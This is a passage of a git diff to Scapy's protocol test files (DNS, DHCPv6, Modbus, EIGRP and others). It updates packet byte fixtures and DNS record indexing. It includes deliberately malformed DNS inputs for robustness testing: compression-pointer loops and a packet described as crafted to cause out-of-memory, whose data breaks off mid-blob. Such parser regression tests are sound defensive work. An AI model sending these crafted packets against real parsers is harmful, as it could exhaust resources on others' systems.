EIGRPSeq) = EIGRPGuessPayloadClass function: Return Software Version TLV -isinstance(_EIGRPGuessPayloadClass(b"\x00\x04"), EIGRPSwVer) +isinstance(_EIGRPGuessPayloadClass(b"\x00\x04" + b"\x00" * 50), EIGRPSwVer) = EIGRPGuessPayloadClass function: Return Next Multicast Sequence TLV -isinstance(_EIGRPGuessPayloadClass(b"\x00\x05"), EIGRPNms) +isinstance(_EIGRPGuessPayloadClass(b"\x00\x05" + b"\x00" * 50), EIGRPNms) = EIGRPGuessPayloadClass function: Return Stub Router TLV -isinstance(_EIGRPGuessPayloadClass(b"\x00\x06"), EIGRPStub) +isinstance(_EIGRPGuessPayloadClass(b"\x00\x06" + b"\x00" * 50), EIGRPStub) = EIGRPGuessPayloadClass function: Return Internal Route TLV -isinstance(_EIGRPGuessPayloadClass(b"\x01\x02"), EIGRPIntRoute) +isinstance(_EIGRPGuessPayloadClass(b"\x01\x02" + b"\x00" * 50), EIGRPIntRoute) = EIGRPGuessPayloadClass function: Return External Route TLV -isinstance(_EIGRPGuessPayloadClass(b"\x01\x03"), EIGRPExtRoute) +isinstance(_EIGRPGuessPayloadClass(b"\x01\x03" + b"\x00" * 50), EIGRPExtRoute) = EIGRPGuessPayloadClass function: Return IPv6 Internal Route TLV -isinstance(_EIGRPGuessPayloadClass(b"\x04\x02"), EIGRPv6IntRoute) +isinstance(_EIGRPGuessPayloadClass(b"\x04\x02" + b"\x00" * 50), EIGRPv6IntRoute) = EIGRPGuessPayloadClass function: Return IPv6 External Route TLV -isinstance(_EIGRPGuessPayloadClass(b"\x04\x03"), EIGRPv6ExtRoute) +isinstance(_EIGRPGuessPayloadClass(b"\x04\x03" + b"\x00" * 100), EIGRPv6ExtRoute) = EIGRPGuessPayloadClass function: Return EIGRPGeneric -isinstance(_EIGRPGuessPayloadClass(b"\x23\x42"), EIGRPGeneric) +isinstance(_EIGRPGuessPayloadClass(b"\x23\x42" + b"\x00" * 50), EIGRPGeneric) + TLV List diff --git a/test/contrib/erspan.uts b/test/contrib/erspan.uts index cdff9e2b64b..e4465b382f1 100644 --- a/test/contrib/erspan.uts +++ b/test/contrib/erspan.uts @@ -14,14 +14,14 @@ assert pkt.seqnum_present == 0 pkt = GRE()/ERSPAN_II()/Ether(src="11:11:11:11:11:11", dst="ff:ff:ff:ff:ff:ff") b = bytes(pkt) -assert b == b'\x10\x00\x88\xbe\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\x11\x11\x11\x11\x11\x11\x90\x00' +assert b == b'\x10\x00\x88\xbe\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\x11\x11\x11\x11\x11\x11\x90\x00' = Dissect ERSPAN II pkt = GRE(b) assert pkt[GRE].proto == 0x88be assert pkt[GRE].seqnum_present == 1 -assert pkt[GRE][ERSPAN].ver == 0 +assert pkt[GRE][ERSPAN].ver == 1 assert pkt[Ether].src == "11:11:11:11:11:11" + ERSPAN III diff --git a/test/contrib/ethercat.uts b/test/contrib/ethercat.uts index 20f63571759..6e1d872212e 100644 --- a/test/contrib/ethercat.uts +++ b/test/contrib/ethercat.uts @@ -183,6 +183,9 @@ assert frm[EtherCat].length == 60 nums_11_bits = [random.randint(0, 65535) & 0b11111111111 for dummy in range(0, 23)] nums_4_bits = [random.randint(0, 16) & 0b1111 for dummy in range(0, 23)] +old_max_list_count = conf.max_list_count +conf.max_list_count = 3000 + frm = Ether()/EtherCat()/EtherCatAPRD(adp=0x1234, ado=0x5678, irq=0xbad0, wkc=0xbeef, data=[1]*2035, c=1) frm = Ether(frm.do_build()) assert frm[EtherCat].length == 2047 @@ -215,6 +218,8 @@ assert frm[EtherCatAPRD].c == 0 assert frm[EtherCat]._reserved == 0 +conf.max_list_count = old_max_list_count + = EtherCat and Type12 DLPDU layers for type_id in EtherCat.ETHERCAT_TYPE12_DLPDU_TYPES: diff --git a/test/contrib/ldp.uts b/test/contrib/ldp.uts index 5e184bcdd7d..af6bcbb17d5 100644 --- a/test/contrib/ldp.uts +++ b/test/contrib/ldp.uts @@ -44,5 +44,6 @@ assert pkti.params == [180, 0, 0, 0, 0, '1.1.2.2', 0] pkta = LDPAddress(address=['1.1.2.2', '172.16.2.1'])/LDPLabelMM(fec=[('172.16.2.0', 31)])/LDPLabelMM(fec=[('1.1.2.2', 32)])/LDPLabelMM(fec=[('1.1.2.1', 32)]) = Advanced dissection - complex LDP +load_contrib("mpls") pkt = Ether(b"\xcc\x04\x04\xdc\x00\x10\xcc\x03\x04\xdc\x00\x10\x88G\x00\x01-\xfeE\xc0\x014\xfe\x84\x00\x00\xff\x06\xb5z\x01\x01\x02\x02\x01\x01\x02\x01\xe4\xe4\x02\x86\xbf\xfb'\xe4\xb9\xb3\xe4GP\x10\x0e\xb6v\x9f\x00\x00\x00\x01\x01\x08\x01\x01\x02\x02\x00\x00\x03\x00\x00\x12\x00\x00\x00\x0e\x01\x01\x00\n\x00\x01\x01\x01\x02\x02\xac\x10\x02\x01\x04\x00\x00\x18\x00\x00\x00\x0f\x01\x00\x00\x08\x02\x00\x01\x1f\xac\x10\x02\x00\x02\x00\x00\x04\x00\x00\x00\x03\x04\x00\x00\x18\x00\x00\x00\x10\x01\x00\x00\x08\x02\x00\x01 \x01\x01\x02\x02\x02\x00\x00\x04\x00\x00\x00\x03\x04\x00\x00\x18\x00\x00\x00\x11\x01\x00\x00\x08\x02\x00\x01 \x01\x01\x02\x01\x02\x00\x00\x04\x00\x00\x00\x12\x04\x00\x00\x18\x00\x00\x00\x12\x01\x00\x00\x08\x02\x00\x01 \x01\x01\x01\x02\x02\x00\x00\x04\x00\x00\x00\x13\x04\x00\x00\x18\x00\x00\x00\x13\x01\x00\x00\x08\x02\x00\x01 \x01\x01\x01\x01\x02\x00\x00\x04\x00\x00\x00\x14\x04\x00\x00\x18\x00\x00\x00\x14\x01\x00\x00\x08\x02\x00\x01\x1f\xac\x10\x01\x00\x02\x00\x00\x04\x00\x00\x00\x15\x04\x00\x00\x18\x00\x00\x00\x15\x01\x00\x00\x08\x02\x00\x01\x1f\xac\x10\x00\x00\x02\x00\x00\x04\x00\x00\x00\x16\x04\x00\x00$\x00\x00\x00\x16\x01\x00\x00\x14\x80\x80\x05\x0c\x00\x00\x00\x00\x00\x00\x00\n\x01\x04\x05\xdc\x0c\x04\x03\x02\x02\x00\x00\x04\x00\x00\x00\x10") assert pkt.getlayer(LDPLabelMM, 8).fec == [('0.0.0.0', 12), ('0.0.0.0', 0), ('5.0.0.0', 4), ('2.0.0.0', 3)] diff --git a/test/contrib/modbus.uts b/test/contrib/modbus.uts index a65b2532aaa..5a010ef73c0 100644 --- a/test/contrib/modbus.uts +++ b/test/contrib/modbus.uts @@ -105,7 +105,7 @@ assert isinstance(p.payload, ModbusPDU0BGetCommEventCounterError) p = ModbusADURequest(b'\x00\x00\x00\x00\x00\x02\xff\x0c') assert isinstance(p.payload, ModbusPDU0CGetCommEventLogRequest) = MBAP Guess Payload ModbusPDU0CGetCommEventLogResponse -p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x02\xff\x0c') +p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x02\xff\x0c\x00\x00\x00\x00\x00\x00\x00') assert isinstance(p.payload, ModbusPDU0CGetCommEventLogResponse) = MBAP Guess Payload ModbusPDU0CGetCommEventLogError p = ModbusADUResponse(b'\x00\x00\x00\x00\x00\x03\xff\x8c\x01') diff --git a/test/contrib/pcom.uts b/test/contrib/pcom.uts index 110a4db86cd..b5ad57e8586 100755 --- a/test/contrib/pcom.uts +++ b/test/contrib/pcom.uts @@ -16,10 +16,10 @@ r = b'\x65\x00\x04\x00\x00\x00\x00\x00' raw(PCOMResponse() / b'\x00\x00\x00\x00')[2:] == r = PCOM/TCP Guess Payload Class -assert isinstance(PCOMRequest(b'\x00\x00\x65\x00\x01\x00\x00\x00').payload, PCOMAsciiRequest) -assert isinstance(PCOMResponse(b'\x00\x00\x65\x00\x01\x00\x00\x00').payload, PCOMAsciiResponse) -assert isinstance(PCOMRequest(b'\x00\x00\x66\x00\x01\x00\x00\x00').payload, PCOMBinaryRequest) -assert isinstance(PCOMResponse(b'\x00\x00\x66\x00\x01\x00\x00\x00').payload, PCOMBinaryResponse) +assert isinstance(PCOMRequest(b'\x00\x00\x65\x00\x01\x00\x00\x00\x00\x00\x00\x00').payload, PCOMAsciiRequest) +assert isinstance(PCOMResponse(b'\x00\x00\x65\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00').payload, PCOMAsciiResponse) +assert isinstance(PCOMRequest(b'\x00\x00\x66\x00\x01\x00\x00\x00' + b'\x00' * 25).payload, PCOMBinaryRequest) +assert isinstance(PCOMResponse(b'\x00\x00\x66\x00\x01\x00\x00\x00' + b'\x00' * 25).payload, PCOMBinaryResponse) + Test PCOM/Ascii = PCOM/ASCII Default values diff --git a/test/contrib/pim.uts b/test/contrib/pim.uts index 195c645e6dc..7fbba92a565 100644 --- a/test/contrib/pim.uts +++ b/test/contrib/pim.uts @@ -7,7 +7,7 @@ = PIMv2 Hello - instantiation -hello_data = b'\x01\x00^\x00\x00\r\x00\xd0\xcb\x00\xba\xe4\x08\x00E\xc0\x00BY\xf9\x00\x00\x01gTe\x15\x15\x15\x15\xe0\x00\x00\r \x00\xa55\x00\x01\x00\x02\x00i\x00\x13\x00\x04\x00\x00\x00\x00\x00\x02\x00\x04\x01\xf4\t\xc4\x00\x14\x00\x04' +hello_data = b'\x01\x00^\x00\x00\r\x00\xd0\xcb\x00\xba\xe4\x08\x00E\xc0\x00BY\xf9\x00\x00\x01gTe\x15\x15\x15\x15\xe0\x00\x00\r \x00\xa55\x00\x01\x00\x02\x00i\x00\x13\x00\x04\x00\x00\x00\x00\x00\x02\x00\x04\x01\xf4\t\xc4\x00\x14\x00\x04\x00\x00\x00\x00' hello_pkt = Ether(hello_data) diff --git a/test/scapy/layers/dhcp6.uts b/test/scapy/layers/dhcp6.uts index b076df7d9b3..ae23482e108 100644 --- a/test/scapy/layers/dhcp6.uts +++ b/test/scapy/layers/dhcp6.uts @@ -298,7 +298,7 @@ raw(DHCP6OptOptReq(reqopts=[])) == b'\x00\x06\x00\x00' = DHCP6OptOptReq - Basic dissection a=DHCP6OptOptReq(b'\x00\x06\x00\x00') -a.optcode == 6 and a.optlen == 0 and a.reqopts == [23,24] +a.optcode == 6 and a.optlen == 0 and a.reqopts == [] = DHCP6OptOptReq - Dissection with specific value a=DHCP6OptOptReq(b'\x00\x06\x00\x08\x00\x01\x00\x02\x00\x03\x00\x04') @@ -1022,7 +1022,7 @@ raw(DHCP6OptRelayAgentERO(reqopts=[])) == b'\x00+\x00\x00' = DHCP6OptRelayAgentERO - Basic dissection a=DHCP6OptRelayAgentERO(b'\x00+\x00\x00') -a.optcode == 43 and a.optlen == 0 and a.reqopts == [23,24] +a.optcode == 43 and a.optlen == 0 and a.reqopts == [] = DHCP6OptRelayAgentERO - Dissection with specific value a=DHCP6OptRelayAgentERO(b'\x00+\x00\x08\x00\x01\x00\x02\x00\x03\x00\x04') @@ -1451,7 +1451,7 @@ raw(DHCP6OptRelayMsg(optcode=37)) == b'\x00%\x00\x04\x00\x00\x00\x00' = DHCP6OptRelayMsg - Basic Dissection a = DHCP6OptRelayMsg(b'\x00\r\x00\x00') -a.optcode == 13 and a.optlen == 0 and isinstance(a.message, DHCP6) +a.optcode == 13 and a.optlen == 0 and a.message is None = DHCP6OptRelayMsg - Embedded DHCP6 packet Instantiation raw(DHCP6OptRelayMsg(message=DHCP6_Solicit())) == b'\x00\t\x00\x04\x01\x00\x00\x00' diff --git a/test/scapy/layers/dns.uts b/test/scapy/layers/dns.uts index 77e600446dc..27bc8985bbe 100644 --- a/test/scapy/layers/dns.uts +++ b/test/scapy/layers/dns.uts @@ -26,11 +26,11 @@ assert query.qname == query.__class__(raw(query)).qname ~ netaccess needs_root IP UDP DNS dns_ans.show() dns_ans.show2() -dns_ans[DNS].an.show() +dns_ans[DNS].an[0].show() dns_ans2 = IP(raw(dns_ans)) DNS in dns_ans2 assert raw(dns_ans2) == raw(dns_ans) -dns_ans2.qd.qname = "www.secdev.org." +dns_ans2.qd[0].qname = "www.secdev.org." * We need to recalculate these values del dns_ans2[IP].len del dns_ans2[IP].chksum @@ -44,13 +44,13 @@ assert raw(DNSRR(type='A', rdata='1.2.3.4')) == b'\x00\x00\x01\x00\x01\x00\x00\x pkt = IP(raw(IP(src="10.0.0.1", dst="8.8.8.8")/UDP(sport=RandShort(), dport=53)/DNS(qd=DNSQR(qname="secdev.org.")))) assert UDP in pkt and isinstance(pkt[UDP].payload, DNS) assert pkt[UDP].dport == 53 and pkt[UDP].length is None -assert pkt[DNS].qdcount == 1 and pkt[DNS].qd.qname == b"secdev.org." +assert pkt[DNS].qdcount == 1 and pkt[DNS].qd[0].qname == b"secdev.org." * DNS over TCP pkt = IP(raw(IP(src="10.0.0.1", dst="8.8.8.8")/TCP(sport=RandShort(), dport=53, flags="P")/DNS(qd=DNSQR(qname="secdev.org.")))) assert TCP in pkt and isinstance(pkt[TCP].payload, DNS) assert pkt[TCP].dport == 53 and pkt[DNS].length is not None -assert pkt[DNS].qdcount == 1 and pkt[DNS].qd.qname == b"secdev.org." +assert pkt[DNS].qdcount == 1 and pkt[DNS].qd[0].qname == b"secdev.org." = DNS frame with advanced decompression ~ dns @@ -60,7 +60,9 @@ pkt = Ether(a) assert pkt.ancount == 3 assert pkt.arcount == 4 assert pkt.an[1].rdata == b'Zalmoid.local.' +assert pkt.an[1].rdlen is None assert pkt.an[2].rdata == b'Zalmoid.local.' +assert pkt.an[2].rdlen is None assert pkt.ar[1].nextname == b'1.A.9.4.7.E.A.4.B.A.F.B.2.1.4.0.0.6.E.F.7.1.F.2.5.3.E.0.1.0.A.2.ip6.arpa.' assert pkt.ar[2].nextname == b'136.0.168.192.in-addr.arpa.' pkt.show() @@ -80,25 +82,46 @@ assert b.an[6].rdata == b'24:e3:14:4d:84:c0@fe80::26e3:14ff:fe4d:84c0._apple-mob c = b'\x01\x00^\x00\x00\xfb\x14\x0cv\x8f\xfe(\x08\x00E\x00\x01C\xe3\x91@\x00\xff\x11\xf4u\xc0\xa8\x00\xfe\xe0\x00\x00\xfb\x14\xe9\x14\xe9\x01/L \x00\x00\x84\x00\x00\x00\x00\x04\x00\x00\x00\x00\x05_raop\x04_tcp\x05local\x00\x00\x0c\x00\x01\x00\x00\x11\x94\x00\x1e\x1b140C768FFE28@Freebox Server\xc0\x0c\xc0(\x00\x10\x80\x01\x00\x00\x11\x94\x00\xa0\ttxtvers=1\x08vs=190.9\x04ch=2\x08sr=44100\x05ss=16\x08pw=false\x06et=0,1\x04ek=1\ntp=TCP,UDP\x13am=FreeboxServer1,2\ncn=0,1,2,3\x06md=0,2\x07sf=0x44\x0bft=0xBF0A00\x08sv=false\x07da=true\x08vn=65537\x04vv=2\xc0(\x00!\x80\x01\x00\x00\x00x\x00\x19\x00\x00\x00\x00\x13\x88\x10Freebox-Server-3\xc0\x17\xc1\x04\x00\x01\x80\x01\x00\x00\x00x\x00\x04\xc0\xa8\x00\xfe' pkt = Ether(c) assert DNS in pkt -assert pkt.an.rdata == b'140C768FFE28@Freebox Server._raop._tcp.local.' -assert pkt.an.getlayer(DNSRR, type=1).rrname == b'Freebox-Server-3.local.' -assert pkt.an.getlayer(DNSRR, type=1).rdata == '192.168.0.254' -assert pkt.an.getlayer(DNSRR, type=16).rdata == [b'txtvers=1', b'vs=190.9', b'ch=2', b'sr=44100', b'ss=16', b'pw=false', b'et=0,1', b'ek=1', b'tp=TCP,UDP', b'am=FreeboxServer1,2', b'cn=0,1,2,3', b'md=0,2', b'sf=0x44', b'ft=0xBF0A00', b'sv=false', b'da=true', b'vn=65537', b'vv=2'] +assert pkt.an[0].rdata == b'140C768FFE28@Freebox Server._raop._tcp.local.' +assert pkt.an[1].rdata == [b'txtvers=1', b'vs=190.9', b'ch=2', b'sr=44100', b'ss=16', b'pw=false', b'et=0,1', b'ek=1', b'tp=TCP,UDP', b'am=FreeboxServer1,2', b'cn=0,1,2,3', b'md=0,2', b'sf=0x44', b'ft=0xBF0A00', b'sv=false', b'da=true', b'vn=65537', b'vv=2'] +assert pkt.an[2].rrname == b'140C768FFE28@Freebox Server._raop._tcp.local.' +assert pkt.an[2].port == 5000 +assert pkt.an[2].target == b'Freebox-Server-3.local.' +assert pkt.an[3].rrname == b'Freebox-Server-3.local.' +assert pkt.an[3].rdata == '192.168.0.254' + += Other compressed DNS +~ dns +s = b'\x00\x00\x84\x00\x00\x00\x00\x02\x00\x00\x00\x06\x0bGourmandise\x04_smb\x04_tcp\x05local\x00\x00!\x80\x01\x00\x00\x00x\x00\x14\x00\x00\x00\x00\x01\xbd\x0bGourmandise\xc0"\x0bGourmandise\x0b_afpovertcp\xc0\x1d\x00!\x80\x01\x00\x00\x00x\x00\x08\x00\x00\x00\x00\x02$\xc09\xc09\x00\x1c\x80\x01\x00\x00\x00x\x00\x10\xfe\x80\x00\x00\x00\x00\x00\x00\x00s#\x99\xca\xf7\xea\xdc\xc09\x00\x01\x80\x01\x00\x00\x00x\x00\x04\xc0\xa8\x01x\xc09\x00\x1c\x80\x01\x00\x00\x00x\x00\x10*\x01\xcb\x00\x0bD\x1f\x00\x18k\xb1\x99\x90\xdf\x84.\xc0\x0c\x00/\x80\x01\x00\x00\x00x\x00\t\xc0\x0c\x00\x05\x00\x00\x80\x00@\xc0G\x00/\x80\x01\x00\x00\x00x\x00\t\xc0G\x00\x05\x00\x00\x80\x00@\xc09\x00/\x80\x01\x00\x00\x00x\x00\x08\xc09\x00\x04@\x00\x00\x08' +pkt = DNS(s) +assert [x.rrname for x in pkt.ar] == [ + b'Gourmandise.local.', + b'Gourmandise.local.', + b'Gourmandise.local.', + b'Gourmandise._smb._tcp.local.', + b'Gourmandise._afpovertcp._tcp.local.', + b'Gourmandise.local.' +] = DNS advanced building ~ dns -pkt = DNS(qr=1, qd=None, aa=1, rd=1) -pkt.an = DNSRR(type=12, rrname='_raop._tcp.local.', rdata='140C768FFE28@Freebox Server._raop._tcp.local.')/DNSRR(rrname='140C768FFE28@Freebox Server._raop._tcp.local.', type=16, rdata=[b'txtvers=1', b'vs=190.9', b'ch=2', b'sr=44100', b'ss=16', b'pw=false', b'et=0,1', b'ek=1', b'tp=TCP,UDP', b'am=FreeboxServer1,2', b'cn=0,1,2,3', b'md=0,2', b'sf=0x44', b'ft=0xBF0A00', b'sv=false', b'da=true', b'vn=65537', b'vv=2'])/DNSRRSRV(rrname='140C768FFE28@Freebox Server._raop._tcp.local.', target='Freebox-Server-3.local.', port=5000, type=33, rclass=32769)/DNSRR(rrname='Freebox-Server-3.local.', rdata='192.168.0.254', rclass=32769, type=1, ttl=120) +pkt = DNS(qr=1, qd=[], aa=1, rd=1) +pkt.an = [ + DNSRR(type=12, rrname='_raop._tcp.local.', rdata='140C768FFE28@Freebox Server._raop._tcp.local.'), + DNSRR(rrname='140C768FFE28@Freebox Server._raop._tcp.local.', type=16, rdata=[b'txtvers=1', b'vs=190.9', b'ch=2', b'sr=44100', b'ss=16', b'pw=false', b'et=0,1', b'ek=1', b'tp=TCP,UDP', b'am=FreeboxServer1,2', b'cn=0,1,2,3', b'md=0,2', b'sf=0x44', b'ft=0xBF0A00', b'sv=false', b'da=true', b'vn=65537', b'vv=2']), + DNSRRSRV(rrname='140C768FFE28@Freebox Server._raop._tcp.local.', target='Freebox-Server-3.local.', port=5000, type=33, rclass=32769), + DNSRR(rrname='Freebox-Server-3.local.', rdata='192.168.0.254', rclass=32769, type=1, ttl=120), +] pkt = DNS(raw(pkt)) -assert DNSRRSRV in pkt.an -assert pkt[DNSRRSRV].target == b'Freebox-Server-3.local.' -assert pkt[DNSRRSRV].rrname == b'140C768FFE28@Freebox Server._raop._tcp.local.' -assert isinstance(pkt[DNSRRSRV].payload, DNSRR) -assert pkt[DNSRRSRV].payload.rrname == b'Freebox-Server-3.local.' -assert pkt[DNSRRSRV].payload.rdata == '192.168.0.254' +assert DNSRRSRV in pkt.an[2] +assert pkt.an[2][DNSRRSRV].target == b'Freebox-Server-3.local.' +assert pkt.an[2][DNSRRSRV].rrname == b'140C768FFE28@Freebox Server._raop._tcp.local.' + +assert pkt.an[3].rrname == b'Freebox-Server-3.local.' +assert pkt.an[3].rdata == '192.168.0.254' = Basic DNS Compression ~ dns @@ -132,44 +155,48 @@ assert raw(recompressed) == raw(pkt) frame = b'E\x00\x00\xa4\x93\x1d\x00\x00y\x11\xdc\xfc\x08\x08\x08\x08\xc0\xa8\x00w\x005\xb4\x9b\x00\x90k\x80\x00\x00\x81\x80\x00\x01\x00\x05\x00\x00\x00\x00\x06google\x03com\x00\x00\x0f\x00\x01\xc0\x0c\x00\x0f\x00\x01\x00\x00\x02B\x00\x11\x00\x1e\x04alt2\x05aspmx\x01l\xc0\x0c\xc0\x0c\x00\x0f\x00\x01\x00\x00\x02B\x00\t\x00\x14\x04alt1\xc0/\xc0\x0c\x00\x0f\x00\x01\x00\x00\x02B\x00\t\x002\x04alt4\xc0/\xc0\x0c\x00\x0f\x00\x01\x00\x00\x02B\x00\t\x00(\x04alt3\xc0/\xc0\x0c\x00\x0f\x00\x01\x00\x00\x02B\x00\x04\x00\n\xc0/' pkt = IP(frame) -results = [x.exchange for x in pkt.an.iterpayloads()] +results = [x.exchange for x in pkt.an] assert results == [b'alt2.aspmx.l.google.com.', b'alt1.aspmx.l.google.com.', b'alt4.aspmx.l.google.com.', b'alt3.aspmx.l.google.com.', b'aspmx.l.google.com.'] pkt.clear_cache() assert raw(dns_compress(pkt)) == frame -= Advanced dns_get_str tests += DNS frame with typebitmaps ~ dns -assert dns_get_str(b"\x06cheese\x00blobofdata....\x06hamand\xc0\x0c", 22, _fullpacket=True)[0] == b'hamand.cheese.' - compressed_pkt = b'\x01\x00^\x00\x00\xfb\xa0\x10\x81\xd9\xd3y\x08\x00E\x00\x01\x14\\\n@\x00\xff\x116n\xc0\xa8F\xbc\xe0\x00\x00\xfb\x14\xe9\x14\xe9\x01\x00Ho\x00\x00\x84\x00\x00\x00\x00\x04\x00\x00\x00\x03\x03188\x0270\x03168\x03192\x07in-addr\x04arpa\x00\x00\x0c\x80\x01\x00\x00\x00x\x00\x0f\x07Android\x05local\x00\x019\x017\x013\x01D\x019\x01D\x01E\x01F\x01F\x01F\x011\x018\x010\x011\x012\x01A\x010\x010\x010\x010\x010\x010\x010\x010\x010\x010\x010\x010\x010\x018\x01E\x01F\x03ip6\xc0#\x00\x0c\x80\x01\x00\x00\x00x\x00\x02\xc03\xc03\x00\x01\x80\x01\x00\x00\x00x\x00\x04\xc0\xa8F\xbc\xc03\x00\x1c\x80\x01\x00\x00\x00x\x00\x10\xfe\x80\x00\x00\x00\x00\x00\x00\xa2\x10\x81\xff\xfe\xd9\xd3y\xc0\x0c\x00/\x80\x01\x00\x00\x00x\x00\x06\xc0\x0c\x00\x02\x00\x08\xc0B\x00/\x80\x01\x00\x00\x00x\x00\x06\xc0B\x00\x02\x00\x08\xc03\x00/\x80\x01\x00\x00\x00x\x00\x08\xc03\x00\x04@\x00\x00\x08' +pkt = Ether(compressed_pkt) +assert pkt.ar[2].nextname == b"Android.local." +assert pkt.ar[2].sprintf("%typebitmaps%") == "['A', 'AAAA']" + += Advanced dns_get_str tests +~ dns -Ether(compressed_pkt) +full = b"\x06cheese\x00blobofdata....\x06hamand\xc0\x00" +assert dns_get_str(full[22:], full=full)[0] == b'hamand.cheese.' = Decompression loop in dns_get_str ~ dns -assert dns_get_str(b"\x04data\xc0\x0c", 0, _fullpacket=True)[0] == b"data.data." +full = b"\x04data\xc0\x00" +assert dns_get_str(full, full=full)[0] == b"data.data." = Prematured end in dns_get_str ~ dns -assert dns_get_str(b"\x06da", 0, _fullpacket=True)[0] == b"da." -assert dns_get_str(b"\x04data\xc0\x01", 0, _fullpacket=True)[0] == b"data." +assert dns_get_str(b"\x06da", 0)[0] == b"da." + +full = b"\x04data\xc0\x0f" +assert dns_get_str(full, full=full)[0] == b"data." -= Other decompression loop in dns_get_str -~ dns -s = b'\x00\x00\x84\x00\x00\x00\x00\x02\x00\x00\x00\x06\x0bGourmandise\x04_smb\x04_tcp\x05local\x00\x00!\x80\x01\x00\x00\x00x\x00\x14\x00\x00\x00\x00\x01\xbd\x0bGourmandise\xc0"\x0bGourmandise\x0b_afpovertcp\xc0\x1d\x00!\x80\x01\x00\x00\x00x\x00\x08\x00\x00\x00\x00\x02$\xc09\xc09\x00\x1c\x80\x01\x00\x00\x00x\x00\x10\xfe\x80\x00\x00\x00\x00\x00\x00\x00s#\x99\xca\xf7\xea\xdc\xc09\x00\x01\x80\x01\x00\x00\x00x\x00\x04\xc0\xa8\x01x\xc09\x00\x1c\x80\x01\x00\x00\x00x\x00\x10*\x01\xcb\x00\x0bD\x1f\x00\x18k\xb1\x99\x90\xdf\x84.\xc0\x0c\x00/\x80\x01\x00\x00\x00x\x00\t\xc0\x0c\x00\x05\x00\x00\x80\x00@\xc0G\x00/\x80\x01\x00\x00\x00x\x00\t\xc0G\x00\x05\x00\x00\x80\x00@\xc09\x00/\x80\x01\x00\x00\x00x\x00\x08\xc09\x00\x04@\x00\x00\x08' -DNS(s) = DNS record type 16 (TXT) -p = DNS(raw(DNS(id=1,ra=1,qd=None,an=DNSRR(rrname='scapy', type='TXT', rdata="niceday", ttl=1)))) -assert p[DNS].an.rdata == [b"niceday"] +p = DNS(raw(DNS(id=1,ra=1,qd=[],an=DNSRR(rrname='scapy', type='TXT', rdata="niceday", ttl=1)))) +assert p[DNS].an[0].rdata == [b"niceday"] -p = DNS(raw(DNS(id=1,ra=1,qd=None,an=DNSRR(rrname='secdev', type='TXT', rdata=["sweet", "celestia"], ttl=1)))) -assert p[DNS].an.rdata == [b"sweet", b"celestia"] +p = DNS(raw(DNS(id=1,ra=1,qd=[],an=DNSRR(rrname='secdev', type='TXT', rdata=["sweet", "celestia"], ttl=1)))) +assert p[DNS].an[0].rdata == [b"sweet", b"celestia"] assert raw(p) == b'\x00\x01\x01\x80\x00\x00\x00\x01\x00\x00\x00\x00\x06secdev\x00\x00\x10\x00\x01\x00\x00\x00\x01\x00\x0f\x05sweet\x08celestia' = DNS - Malformed DNS over TCP message @@ -178,13 +205,13 @@ _old_dbg = conf.debug_dissector conf.debug_dissector = True try: - p = IP(raw(IP()/TCP()/DNS(qd=None,length=28))[:-13]) + p = IP(raw(IP()/TCP()/DNS(qd=[],length=28))[:-13]) assert False except Scapy_Exception as e: assert str(e) == "Malformed DNS message: too small!" try: - p = IP(raw(IP()/TCP()/DNS(qd=None,length=28, qdcount=1))) + p = IP(raw(IP()/TCP()/DNS(qd=[],length=28, qdcount=1))) assert False except Scapy_Exception as e: assert str(e) == "Malformed DNS message: invalid length!" @@ -196,17 +223,17 @@ conf.debug_dissector = _old_dbg data = b'E\x00\x00n~\x82\x00\x00{\x11\xae\xeb\x08\x08\x08\x08\x01\x01\x01\x01\x005\x005\x00Z!\x17\x00\x00\x81\x80\x00\x01\x00\x00\x00\x01\x00\x00\x03www\x06google\x03com\x00\x00\x0f\x00\x01\xc0\x10\x00\x06\x00\x01\x00\x00\x002\x00&\x03ns1\xc0\x10\tdns-admin\xc0\x10\x14Po\x8f\x00\x00\x03\x84\x00\x00\x03\x84\x00\x00\x07\x08\x00\x00\x00<' p = IP(data) -assert p.ns.rrname == b"google.com." -assert p.ns.mname == b"ns1.google.com." -assert p.ns.rname == b"dns-admin.google.com." +assert p.ns[0].rrname == b"google.com." +assert p.ns[0].mname == b"ns1.google.com." +assert p.ns[0].rname == b"dns-admin.google.com." cp = dns_compress(p) -assert cp.ns.rrname == b'\xc0\x10' -assert cp.ns.mname == b'\x03ns1\xc0\x10' -assert cp.ns.rname == b'\tdns-admin\xc0\x10' +assert cp.ns[0].rrname == b'\xc0\x10' +assert cp.ns[0].mname == b'\x03ns1\xc0\x10' +assert cp.ns[0].rname == b'\tdns-admin\xc0\x10' p = IP(raw(cp)) -assert p.ns.rrname == b"google.com." -assert p.ns.mname == b"ns1.google.com." -assert p.ns.rname == b"dns-admin.google.com." +assert p.ns[0].rrname == b"google.com." +assert p.ns[0].mname == b"ns1.google.com." +assert p.ns[0].rname == b"dns-admin.google.com." = DNS - dns_compress on close indexes @@ -214,9 +241,9 @@ p = dns_compress(DNS(qd=DNSQR(qname=b'scapy.'), an=DNSRR(rrname=b'scapy.'), ar=D assert raw(p) == b'\x00\x00\x01\x00\x00\x01\x00\x01\x00\x00\x00\x01\x05scapy\x00\x00\x01\x00\x01\xc0\x0c\x00\x01\x00\x01\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00)\x10\x00\x00\x00\x80\x00\x00\x00' p = DNS(raw(p)) -assert p.qd.qname == b'scapy.' -assert p.an.rrname == b'scapy.' -assert p.ar.rrname == b'.' +assert p.qd[0].qname == b'scapy.' +assert p.an[0].rrname == b'scapy.' +assert p.ar[0].rrname == b'.' = DNS - dns_encode edge cases @@ -228,14 +255,38 @@ assert dns_encode(dns_encode(b"*")) == b'\x03\x01*\x00' assert raw(DNS()) == b'\x00\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x03www\x07example\x03com\x00\x00\x01\x00\x01' -= DNS - preserve rdlen when rdata is not a compressed DNS string += DNS - OOM test +% parse a DNS packet specifically crafted for OOM + +import zlib +data = zlib.decompress(b'x\x9c\xed\xce!\n\xc2`\x00\x80\xd1\x7f\x0c\xc1\xbal\xf1\x12\x1e\xc0 